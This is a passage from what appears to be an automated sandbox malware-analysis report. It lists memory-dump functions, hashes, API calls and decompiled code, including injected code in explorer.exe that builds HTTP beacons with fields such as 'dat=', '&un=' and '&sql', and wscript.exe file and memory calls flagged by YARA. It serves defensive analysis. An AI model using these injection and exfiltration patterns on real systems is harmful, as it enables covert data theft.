Associated: 00000002.00000002.358798882.0000000002A4B000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.358805587.0000000002A4F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dbfc05a6d40c4d88f0455b3159379c04efe77bc4b9435c78c4337e49ac27899e
Instruction ID: a75cbee91f21ce470041ce3ca82aedbb0f4788bf6ce96501ad948461ece599b0
Opcode Fuzzy Hash: dbfc05a6d40c4d88f0455b3159379c04efe77bc4b9435c78c4337e49ac27899e
Instruction Fuzzy Hash: C1900271A05200229140715948246474056A7E0785B95C011A0504594C8D948A5563F1

Uniqueness

Uniqueness Score: -1.00%

Function 02999520, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.358703617.0000000002930000.00000040.00000001.sdmp, Offset: 02930000, based on PE: true

Associated: 00000002.00000002.358798882.0000000002A4B000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.358805587.0000000002A4F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: af6cc1bb1700c9a8e434b9b262bda7e131cc8d1dcb44b456889fee62556c1964
Instruction ID: 2ebdeacfd8ba8cfa70792e01566c089056b1d24829368a8d166ea3748d9a1732
Opcode Fuzzy Hash: af6cc1bb1700c9a8e434b9b262bda7e131cc8d1dcb44b456889fee62556c1964
Instruction Fuzzy Hash: 2E9002E1201340A24500A2598414B0B455597E0245B91C016E10445A0CC9658851A1B5

Uniqueness

Uniqueness Score: -1.00%

Function 02999560, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.358703617.0000000002930000.00000040.00000001.sdmp, Offset: 02930000, based on PE: true

Associated: 00000002.00000002.358798882.0000000002A4B000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.358805587.0000000002A4F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8b11057b552689c651eced84cc33704e636f57cfb0d6e60368a902f43392eff8
Instruction ID: 4f187ef99233a1b8201642fa4a69447cc378f1b8944902ab605c898d7a7f9257
Opcode Fuzzy Hash: 8b11057b552689c651eced84cc33704e636f57cfb0d6e60368a902f43392eff8
Instruction Fuzzy Hash: F4900265221200120145A559061450B0495A7D63953D1C015F14065D0CCA61886563B1

Uniqueness

Uniqueness Score: -1.00%

Function 02999670, Relevance: .0, Instructions: 2COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.358703617.0000000002930000.00000040.00000001.sdmp, Offset: 02930000, based on PE: true

Associated: 00000002.00000002.358798882.0000000002A4B000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.358805587.0000000002A4F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
Instruction ID: b46bc23b04ca447f6cfa53377e632aa12928f3f8cbd7c8636cddd9b2227a4aed
Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 0298645B, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 109
timeCOMMON

Download Yara Rule

C-Code - Quality: 26%

			E0298645B(void* __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v8;
				void* _v36;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				char _v60;
				char _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t48;
				intOrPtr _t49;
				intOrPtr _t50;
				intOrPtr* _t52;
				char _t56;
				void* _t69;
				char _t72;
				void* _t73;
				intOrPtr _t75;
				intOrPtr _t79;
				void* _t82;
				void* _t84;
				intOrPtr _t86;
				void* _t88;
				signed int _t90;
				signed int _t92;
				signed int _t93;

				_t80 = __edx;
				_t92 = (_t90 & 0xfffffff8) - 0x4c;
				_v8 =  *0x2a4d360 ^ _t92;
				_t72 = 0;
				_v72 = __edx;
				_t82 = __ecx;
				_t86 =  *((intOrPtr*)(__edx + 0xc8));
				_v68 = _t86;
				E0299FA60( &_v60, 0, 0x30);
				_t48 =  *((intOrPtr*)(_t82 + 0x70));
				_t93 = _t92 + 0xc;
				_v76 = _t48;
				_t49 = _t48;
				if(_t49 == 0) {
					_push(5);
					 *((char*)(_t82 + 0x6a)) = 0;
					 *((intOrPtr*)(_t82 + 0x6c)) = 0;
					goto L3;
				} else {
					_t69 = _t49 - 1;
					if(_t69 != 0) {
						if(_t69 == 1) {
							_push(0xa);
							goto L3;
						} else {
							_t56 = 0;
						}
					} else {
						_push(4);
						L3:
						_pop(_t50);
						_v80 = _t50;
						if(_a4 == _t72 && _t86 != 0 && _t50 != 0xa &&  *((char*)(_t82 + 0x6b)) == 1) {
							E02972280(_t50, _t86 + 0x1c);
							_t79 = _v72;
							 *((intOrPtr*)(_t79 + 0x20)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
							 *((intOrPtr*)(_t79 + 0x88)) =  *((intOrPtr*)(_t82 + 0x68));
							 *((intOrPtr*)(_t79 + 0x8c)) =  *((intOrPtr*)(_t82 + 0x6c));
							 *((intOrPtr*)(_t79 + 0x90)) = _v80;
							 *((intOrPtr*)(_t79 + 0x20)) = _t72;
							E0296FFB0(_t72, _t82, _t86 + 0x1c);
						}
						_t75 = _v80;
						_t52 =  *((intOrPtr*)(_v72 + 0x20));
						_t80 =  *_t52;
						_v72 =  *((intOrPtr*)(_t52 + 4));
						_v52 =  *((intOrPtr*)(_t82 + 0x68));
						_v60 = 0x30;
						_v56 = _t75;
						_v48 =  *((intOrPtr*)(_t82 + 0x6c));
						asm("movsd");
						_v76 = _t80;
						_v64 = 0x30;
						asm("movsd");
						asm("movsd");
						asm("movsd");
						if(_t80 != 0) {
							 *0x2a4b1e0(_t75, _v72,  &_v64,  &_v60);
							_t72 = _v76();
						}
						_t56 = _t72;
					}
				}
				_pop(_t84);
				_pop(_t88);
				_pop(_t73);
				return E0299B640(_t56, _t73, _v8 ^ _t93, _t80, _t84, _t88);
			}

0x0298645b
0x02986463
0x0298646d
0x02986475
0x0298647a
0x0298647e
0x02986480
0x0298648c
0x02986490
0x02986495
0x02986498
0x0298649b
0x0298649f
0x029864a1
0x029c7c07
0x029c7c09
0x029c7c0c
0x00000000
0x029864a7
0x029864a7
0x029864aa
0x029c7bf7
0x029c7c00
0x00000000
0x029c7bf9
0x029c7bf9
0x029c7bf9
0x029864b0
0x029864b0
0x029864b2
0x029864b2
0x029864b3
0x029864ba
0x02986553
0x0298655e
0x02986566
0x0298656c
0x02986575
0x0298657f
0x02986585
0x02986588
0x02986588
0x029864c7
0x029864cb
0x029864ce
0x029864d3
0x029864da
0x029864e5
0x029864ed
0x029864f1
0x029864f5
0x029864f6
0x029864fa
0x02986502
0x02986503
0x02986504
0x02986507
0x0298651a
0x02986524
0x02986524
0x02986526
0x02986526
0x029864aa
0x0298652c
0x0298652d
0x0298652e
0x02986539

APIs

RtlDebugPrintTimes.NTDLL ref: 0298651A

Strings

0, xrefs: 029864E5
0, xrefs: 029864FA

Memory Dump Source

Source File: 00000002.00000002.358703617.0000000002930000.00000040.00000001.sdmp, Offset: 02930000, based on PE: true

Associated: 00000002.00000002.358798882.0000000002A4B000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.358805587.0000000002A4F000.00000040.00000001.sdmp Download File

Similarity

API ID: DebugPrintTimes
String ID: 0$0
API String ID: 3446177414-203156872
Opcode ID: 9fef03d7c6d55f47d15d72157a3992dc37e175ecbfa11a830eeb1c6ba56df622
Instruction ID: df9d1d59942f77bee51b7bbefdea0b67bd91a9e346d82a852c206274eff75a7a
Opcode Fuzzy Hash: 9fef03d7c6d55f47d15d72157a3992dc37e175ecbfa11a830eeb1c6ba56df622
Instruction Fuzzy Hash: 0A415BB1A047069FC310DF28C544A5ABBE9FB89718F04496EF988DB301D731EA05CF96

Uniqueness

Uniqueness Score: -1.00%

Function 029EFDDA, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42
COMMON

Download Yara Rule

C-Code - Quality: 53%

			E029EFDDA(intOrPtr* __edx, intOrPtr _a4) {
				void* _t7;
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr* _t12;
				intOrPtr* _t13;
				intOrPtr _t14;
				intOrPtr* _t15;

				_t13 = __edx;
				_push(_a4);
				_t14 =  *[fs:0x18];
				_t15 = _t12;
				_t7 = E0299CE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
				_push(_t13);
				E029E5720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
				_t9 =  *_t15;
				if(_t9 == 0xffffffff) {
					_t10 = 0;
				} else {
					_t10 =  *((intOrPtr*)(_t9 + 0x14));
				}
				_push(_t10);
				_push(_t15);
				_push( *((intOrPtr*)(_t15 + 0xc)));
				_push( *((intOrPtr*)(_t14 + 0x24)));
				return E029E5720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
			}

0x029efdda
0x029efde2
0x029efde5
0x029efdec
0x029efdfa
0x029efdff
0x029efe0a
0x029efe0f
0x029efe17
0x029efe1e
0x029efe19
0x029efe19
0x029efe19
0x029efe20
0x029efe21
0x029efe22
0x029efe25
0x029efe40

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 029EFDFA

Strings

RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 029EFE01
RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 029EFE2B

Memory Dump Source

Source File: 00000002.00000002.358703617.0000000002930000.00000040.00000001.sdmp, Offset: 02930000, based on PE: true

Associated: 00000002.00000002.358798882.0000000002A4B000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.358805587.0000000002A4F000.00000040.00000001.sdmp Download File

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
API String ID: 885266447-3903918235
Opcode ID: be7a680a69c1f020ff5b64ab49544499a11c26782377c4b1a1b619ab614f0987
Instruction ID: 8d30770152abf6216e95a33a14e6bb1edbf48c8aff7f47b027f2a739a97188b2
Opcode Fuzzy Hash: be7a680a69c1f020ff5b64ab49544499a11c26782377c4b1a1b619ab614f0987
Instruction Fuzzy Hash: CCF0F676600201BFEE211A95DC02F23BB5BEB88734F150319F629565D1DA62FC30C6F0

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: explorer.exe PID: 3388 Parent PID: 2588 explorer.exeCOMMON

Executed Functions

Function 065C0782, Relevance: 23.6, APIs: 3, Strings: 10, Instructions: 814networkCOMMON

Download Yara Rule

APIs

getaddrinfo.WS2_32 ref: 065C092F
setsockopt.WS2_32 ref: 065C1031
recv.WS2_32 ref: 065C105A

Strings

&un=, xrefs: 065C0CF2
GET , xrefs: 065C0B19
Co, xrefs: 065C0B24
&br=, xrefs: 065C0D0A
ose, xrefs: 065C0B40
nnec, xrefs: 065C0B2B
dat=, xrefs: 065C0A91
: cl, xrefs: 065C0B39
tion, xrefs: 065C0B32
&sql, xrefs: 065C0C72

Memory Dump Source

Source File: 00000013.00000002.476497723.0000000006560000.00000040.00000001.sdmp, Offset: 06560000, based on PE: false

Similarity

API ID: getaddrinforecvsetsockopt
String ID: Co$&br=$&sql$&un=$: cl$GET $dat=$nnec$ose$tion
API String ID: 1564272048-1117930895
Opcode ID: 0648fb3a1b3169a28be7094cd426224deaf617277f2c30b26ba9640e8e035f5f
Instruction ID: e524cbb89dbfdd047b35b893ca752d8bf739d61b5b1e8662b83fdf13d16f0f10
Opcode Fuzzy Hash: 0648fb3a1b3169a28be7094cd426224deaf617277f2c30b26ba9640e8e035f5f
Instruction Fuzzy Hash: F952A730618B488FC7A9EFA8D8847EAB7E1FB94310F50452ED4AFD7142DE70A549CB85

Uniqueness

Uniqueness Score: -1.00%

Function 065BFA32, Relevance: 7.6, APIs: 3, Strings: 1, Instructions: 642nativefileCOMMON

Download Yara Rule

APIs

NtCreateFile.NTDLL ref: 065BFC49
NtReadFile.NTDLL ref: 065BFDFE
NtClose.NTDLL ref: 065BFE08

Strings

`, xrefs: 065BFC1D

Memory Dump Source

Source File: 00000013.00000002.476497723.0000000006560000.00000040.00000001.sdmp, Offset: 06560000, based on PE: false

Similarity

API ID: File$CloseCreateRead
String ID: `
API String ID: 1419693385-2679148245
Opcode ID: 14cba8f2f4844d27189a0e08a02a2bb7e42f2ade297706ca60ab44122fcb4a0a
Instruction ID: fd3b971539298e9f7dea133f45385c0aed552443ad912d4088806072faf00112
Opcode Fuzzy Hash: 14cba8f2f4844d27189a0e08a02a2bb7e42f2ade297706ca60ab44122fcb4a0a
Instruction Fuzzy Hash: A3224A70A28A099FCB99DF68C8956EEF7E1FB98305F50462EE45ED3250DB30E451CB81

Uniqueness

Uniqueness Score: -1.00%

Function 065BCFCC, Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 39COMMON

Download Yara Rule

APIs

closesocket.WS2_32 ref: 065BD027

Strings

ket, xrefs: 065BCFFA
esoc, xrefs: 065BCFF2
clos, xrefs: 065BCFEA

Memory Dump Source

Source File: 00000013.00000002.476497723.0000000006560000.00000040.00000001.sdmp, Offset: 06560000, based on PE: false

Similarity

API ID: closesocket
String ID: clos$esoc$ket
API String ID: 2781271927-3604069445
Opcode ID: 36ea656e2822491c65f3aa84d39bde34fac214f70988beb3bb1069cb2183a916
Instruction ID: 6162fe5269691b0b7a29ae013095b599836c123eaaa8f2de0639c8e59be203ad
Opcode Fuzzy Hash: 36ea656e2822491c65f3aa84d39bde34fac214f70988beb3bb1069cb2183a916
Instruction Fuzzy Hash: BCF0C27021C7494FC780DF289488B99B7E0FBC9314F4806ADE44ECB245C73185428743

Uniqueness

Uniqueness Score: -1.00%

Function 065BCFD2, Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 34COMMON

Download Yara Rule

APIs

closesocket.WS2_32 ref: 065BD027

Strings

ket, xrefs: 065BCFFA
esoc, xrefs: 065BCFF2
clos, xrefs: 065BCFEA

Memory Dump Source

Source File: 00000013.00000002.476497723.0000000006560000.00000040.00000001.sdmp, Offset: 06560000, based on PE: false

Similarity

API ID: closesocket
String ID: clos$esoc$ket
API String ID: 2781271927-3604069445
Opcode ID: 55bc8d18a5d8466a36fa080eecba74d51e4eecc19716f7d67a87230863e9f796
Instruction ID: eda4e931f44f3978efcb420004e8958cef0c1af232328952d8221c86b2249727
Opcode Fuzzy Hash: 55bc8d18a5d8466a36fa080eecba74d51e4eecc19716f7d67a87230863e9f796
Instruction Fuzzy Hash: 9EF01770618B089FCB84EF18D488B6AB6E0FB89314F94566DE44ECB245C77589828B02

Uniqueness

Uniqueness Score: -1.00%

Function 065BCF52, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 51networkCOMMON

Download Yara Rule

APIs

connect.WS2_32 ref: 065BCFB1

Strings

ect, xrefs: 065BCF81
conn, xrefs: 065BCF7A

Memory Dump Source

Source File: 00000013.00000002.476497723.0000000006560000.00000040.00000001.sdmp, Offset: 06560000, based on PE: false

Similarity

API ID: connect
String ID: conn$ect
API String ID: 1959786783-716201944
Opcode ID: bdbe5afaba5d73808d09b5cee695c3c1d891866feefc15c756c93ae076febf5d
Instruction ID: c20a95f8509e52850ee7124db430b0ca5bcea8ead9a9c373139181868e39e5d3
Opcode Fuzzy Hash: bdbe5afaba5d73808d09b5cee695c3c1d891866feefc15c756c93ae076febf5d
Instruction Fuzzy Hash: 9501EC70618A0C8FCBD4EF5CE488B55B7E0FB59315F1545AEE90DCB266CAB4C9818BC2

Uniqueness

Uniqueness Score: -1.00%

Function 065BCF4F, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49networkCOMMON

Download Yara Rule

APIs

connect.WS2_32 ref: 065BCFB1

Strings

ect, xrefs: 065BCF81
conn, xrefs: 065BCF7A

Memory Dump Source

Source File: 00000013.00000002.476497723.0000000006560000.00000040.00000001.sdmp, Offset: 06560000, based on PE: false

Similarity

API ID: connect
String ID: conn$ect
API String ID: 1959786783-716201944
Opcode ID: 2d355b9345ca705121897348be71a861751b67a308a01a927678aed3faaae977
Instruction ID: a619e55745fa8511e48eac958ccf838f991947dc9ce87c8c2dc892036d4dca54
Opcode Fuzzy Hash: 2d355b9345ca705121897348be71a861751b67a308a01a927678aed3faaae977
Instruction Fuzzy Hash: EE015E70918A088FCB84EF4CD488B54B7E0FB58315F1541AED80DDB266C674C9818BC1

Uniqueness

Uniqueness Score: -1.00%

Function 065BCED2, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 53networkCOMMON

Download Yara Rule

APIs

send.WS2_32 ref: 065BCF33

Strings

send, xrefs: 065BCEFA

Memory Dump Source

Source File: 00000013.00000002.476497723.0000000006560000.00000040.00000001.sdmp, Offset: 06560000, based on PE: false

Similarity

API ID: send
String ID: send
API String ID: 2809346765-2809346765
Opcode ID: 2edca90fe128c725c60374c8d60f040d9996720a4e45d5006d927af128ba895d
Instruction ID: c173968dc9737c175dcec7b656e576789a1c7008185232bac7cfa1e4c0e91b10
Opcode Fuzzy Hash: 2edca90fe128c725c60374c8d60f040d9996720a4e45d5006d927af128ba895d
Instruction Fuzzy Hash: 77012570518A0C8FDBC4EF5CD448B25B7E0FB58314F1545AED85DCB266C670D881CB81

Uniqueness

Uniqueness Score: -1.00%

Function 065BCDD2, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 49networkCOMMON

Download Yara Rule

APIs

socket.WS2_32 ref: 065BCE31

Strings

sock, xrefs: 065BCDF9

Memory Dump Source

Source File: 00000013.00000002.476497723.0000000006560000.00000040.00000001.sdmp, Offset: 06560000, based on PE: false

Similarity

API ID: socket
String ID: sock
API String ID: 98920635-2415254727
Opcode ID: a658dfbb0002886f02ed33fbb6ceae53b06ff0d6187248b9ed792d08595e28ac
Instruction ID: 74a13e714b53bade5e335dc65fd98893c795fad52b61b03edecaffcf394d22d8
Opcode Fuzzy Hash: a658dfbb0002886f02ed33fbb6ceae53b06ff0d6187248b9ed792d08595e28ac
Instruction Fuzzy Hash: 83012C70618A088FCB84EF5CE448B54BBE0FB59314F1545AEE85ECB266D7B0C9818B86

Uniqueness

Uniqueness Score: -1.00%

Function 065BCDD0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 48networkCOMMON

Download Yara Rule

APIs

socket.WS2_32 ref: 065BCE31

Strings

sock, xrefs: 065BCDF9

Memory Dump Source

Source File: 00000013.00000002.476497723.0000000006560000.00000040.00000001.sdmp, Offset: 06560000, based on PE: false

Similarity

API ID: socket
String ID: sock
API String ID: 98920635-2415254727
Opcode ID: 10f9494dcd697002e96d8ef7d64bde6d86902f1b0e2736b1f316aa032c1e4241
Instruction ID: 20167be08fd9e5feddc833b3cca9c404e04034555126a6858c57a3dcb9939da6
Opcode Fuzzy Hash: 10f9494dcd697002e96d8ef7d64bde6d86902f1b0e2736b1f316aa032c1e4241
Instruction Fuzzy Hash: 80017C30618A088FCB84EF5CD448B54BBE0FB99314F1945ADD85ECB266D7B0C9818B86

Uniqueness

Uniqueness Score: -1.00%

Function 065BD038, Relevance: 1.6, APIs: 1, Instructions: 100COMMON

Download Yara Rule

APIs

closesocket.WS2_32 ref: 065BD027

Memory Dump Source

Source File: 00000013.00000002.476497723.0000000006560000.00000040.00000001.sdmp, Offset: 06560000, based on PE: false

Similarity

API ID: closesocket
String ID:
API String ID: 2781271927-0
Opcode ID: b6743f46e3f1f2eb3d075961b8be7146a43deac48baf84514c8a2ef2f0373090
Instruction ID: 898d4da46b3b344f9ab6262718800d51c3d141ea6438acd45929dda6093f5346
Opcode Fuzzy Hash: b6743f46e3f1f2eb3d075961b8be7146a43deac48baf84514c8a2ef2f0373090
Instruction Fuzzy Hash: 94210831618A084BDB98DF2CE84477A76E0FBD9315F84577EE88BC7286EA34C5428645

Uniqueness

Uniqueness Score: -1.00%

Function 065B52C9, Relevance: 1.6, APIs: 1, Instructions: 89COMMON

Download Yara Rule

APIs

SleepEx.KERNEL32 ref: 065B531D

Memory Dump Source

Source File: 00000013.00000002.476497723.0000000006560000.00000040.00000001.sdmp, Offset: 06560000, based on PE: false

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 6bb13f69f888b39ab92230b0e49ad81c518a2e564a985a8a781243bfdaa19091
Instruction ID: 7275e03c71032ee9ca0220403577f13a732f741dff6dc4194cede87d01d7bb7d
Opcode Fuzzy Hash: 6bb13f69f888b39ab92230b0e49ad81c518a2e564a985a8a781243bfdaa19091
Instruction Fuzzy Hash: E5314B74914B0ADFDBE8EF6984882E9F7A1FB44300F14527EC92D8A202D7B09554CFD1

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Analysis Process: wscript.exe PID: 1956 Parent PID: 3388 wscript.exeCOMMON

Executed Functions

Function 003E9D50, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 40filenativeCOMMON

Download Yara Rule

APIs

NtCreateFile.NTDLL(00000060,00000000,.z`,?,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,wK>,007A002E,00000000,00000060,00000000,00000000), ref: 003E9D9D

Strings

wK>, xrefs: 003E9D6C, 003E9D78
.z`, xrefs: 003E9D8D, 003E9D98

Memory Dump Source

Source File: 00000018.00000002.460384081.00000000003D0000.00000040.00000001.sdmp, Offset: 003D0000, based on PE: false

Yara matches

Similarity

API ID: CreateFile
String ID: .z`$wK>
API String ID: 823142352-2640775564
Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
Instruction ID: d618125e8815cb37c6251265158c49151a792f03fa56bb9eb2fc33b9c2edef9f
Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
Instruction Fuzzy Hash: F1F0BDB2200208AFCB08CF89DC95EEB77ADAF8C754F158248BA1D97241C630F8118BA4

Uniqueness

Uniqueness Score: -1.00%

Function 003E9F2D, Relevance: 1.6, APIs: 1, Instructions: 50memorynativeCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,003D2D11,00002000,00003000,00000004), ref: 003E9F69

Memory Dump Source

Source File: 00000018.00000002.460384081.00000000003D0000.00000040.00000001.sdmp, Offset: 003D0000, based on PE: false

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: d39ed059615eb75c7949c6bc3a7c51dc8adc9da75c3a5ad595da4fbfff8833bb
Instruction ID: a448c6549e0ba4b687137f490c9f592230c53b707fb50496ec5fabaec88b4b82
Opcode Fuzzy Hash: d39ed059615eb75c7949c6bc3a7c51dc8adc9da75c3a5ad595da4fbfff8833bb
Instruction Fuzzy Hash: 52011AB1200219AFCB14DF89DC81DAB73ADEF88310F118549BD189B241D630E821CBB0

Uniqueness

Uniqueness Score: -1.00%

Function 003E9E00, Relevance: 1.5, APIs: 1, Instructions: 36filenativeCOMMON

Download Yara Rule

APIs

NtReadFile.NTDLL(?,?,FFFFFFFF,003E49F1,?,?,?,?,003E49F1,FFFFFFFF,?,2M>,?,00000000), ref: 003E9E45

Memory Dump Source

Source File: 00000018.00000002.460384081.00000000003D0000.00000040.00000001.sdmp, Offset: 003D0000, based on PE: false

Yara matches

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
Instruction ID: 08f82d4737e0986a2a9a77dc87fad7fa59b5fff082d7b363dcc94cf3b91c4e02
Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
Instruction Fuzzy Hash: 3CF0A4B2200208AFCB14DF89DC91EEB77ADAF8C754F168248BA1D97241D630E8118BA0

Uniqueness

Uniqueness Score: -1.00%

Function 003E9F30, Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,003D2D11,00002000,00003000,00000004), ref: 003E9F69

Memory Dump Source

Source File: 00000018.00000002.460384081.00000000003D0000.00000040.00000001.sdmp, Offset: 003D0000, based on PE: false

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
Instruction ID: 9c05eb98b4a71dfe4204d09798b2700c0de675728872aaef756e4becffb43c77
Opcode Fuzzy Hash: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
Instruction Fuzzy Hash: F1F015B2200218AFCB14DF89CC81EAB77ADAF88750F118248BE1897241C630F810CBB0

Uniqueness

Uniqueness Score: -1.00%

Function 003E9E7C, Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON

Download Yara Rule

APIs

NtClose.NTDLL(003E4D10,?,?,003E4D10,00000000,FFFFFFFF), ref: 003E9EA5

Memory Dump Source

Source File: 00000018.00000002.460384081.00000000003D0000.00000040.00000001.sdmp, Offset: 003D0000, based on PE: false

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: 2ba2111b5ec7dffad050d79ddbd19b2887deae6e2c2de75fd2bbc74d85cf0767
Instruction ID: 9477bc466dfb490c97c964ce07ba431594f3eb797604ed304d26865131273d81
Opcode Fuzzy Hash: 2ba2111b5ec7dffad050d79ddbd19b2887deae6e2c2de75fd2bbc74d85cf0767
Instruction Fuzzy Hash: CFE01275200214BFD710DB95DD45FDB7B59EF44350F154559B95C9B242C630E514C7A0

Uniqueness

Uniqueness Score: -1.00%

Function 003E9E80, Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON

Download Yara Rule

APIs

NtClose.NTDLL(003E4D10,?,?,003E4D10,00000000,FFFFFFFF), ref: 003E9EA5

Memory Dump Source

Source File: 00000018.00000002.460384081.00000000003D0000.00000040.00000001.sdmp, Offset: 003D0000, based on PE: false

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
Instruction ID: 2f1ed1486b0b2fe1aa31cbe222dac59a54682574612a9a20a98ab2652e8259f9
Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
Instruction Fuzzy Hash: 0CD012752002146BD710EB99CC45E97775CEF44750F154555BA5C5B242C530F50086E0

Uniqueness

Uniqueness Score: -1.00%

Function 04B395D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04B395DA

Memory Dump Source

Source File: 00000018.00000002.464600721.0000000004AD0000.00000040.00000001.sdmp, Offset: 04AD0000, based on PE: true

Associated: 00000018.00000002.465343693.0000000004BEB000.00000040.00000001.sdmp Download File
Associated: 00000018.00000002.465357087.0000000004BEF000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 05e1a1a4faacf987ec04f60345139165db50c40f39837dcb00a2e39b469f5c16
Instruction ID: e973ed6279f08793e5d7193e27b8080ab5bed5ab542fbb4d322e2f672486f543
Opcode Fuzzy Hash: 05e1a1a4faacf987ec04f60345139165db50c40f39837dcb00a2e39b469f5c16
Instruction Fuzzy Hash: E29002A230200013610571594414616400ED7E0245B51C065E10055D0EC565D8A17165

Uniqueness

Uniqueness Score: -1.00%

Function 04B39560, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04B3956A

Memory Dump Source

Source File: 00000018.00000002.464600721.0000000004AD0000.00000040.00000001.sdmp, Offset: 04AD0000, based on PE: true

Associated: 00000018.00000002.465343693.0000000004BEB000.00000040.00000001.sdmp Download File
Associated: 00000018.00000002.465357087.0000000004BEF000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 3f814095b52e3c391c8f8ba441f933b728f2842f71d5bd6dd60a0cd0ef16edfc
Instruction ID: e92bee7dcea2b97c2e8e9ae61b1b2dd2248defa135afd01ed668c1cef73b1c57
Opcode Fuzzy Hash: 3f814095b52e3c391c8f8ba441f933b728f2842f71d5bd6dd60a0cd0ef16edfc
Instruction Fuzzy Hash: 0C900266321000122145A559060450B0449E7D6395391C059F14075D0DC661D8757361

Uniqueness

Uniqueness Score: -1.00%

Function 04B39540, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04B3954A

Memory Dump Source

Source File: 00000018.00000002.464600721.0000000004AD0000.00000040.00000001.sdmp, Offset: 04AD0000, based on PE: true

Associated: 00000018.00000002.465343693.0000000004BEB000.00000040.00000001.sdmp Download File
Associated: 00000018.00000002.465357087.0000000004BEF000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 049f3ee8a2783d8f4fc07887880878c18beec288a28d2db1a6dfc0034b8a3c98
Instruction ID: 8b7ec764a850431078afb313418bc80106539003df74f34dc7b10c72aea13730
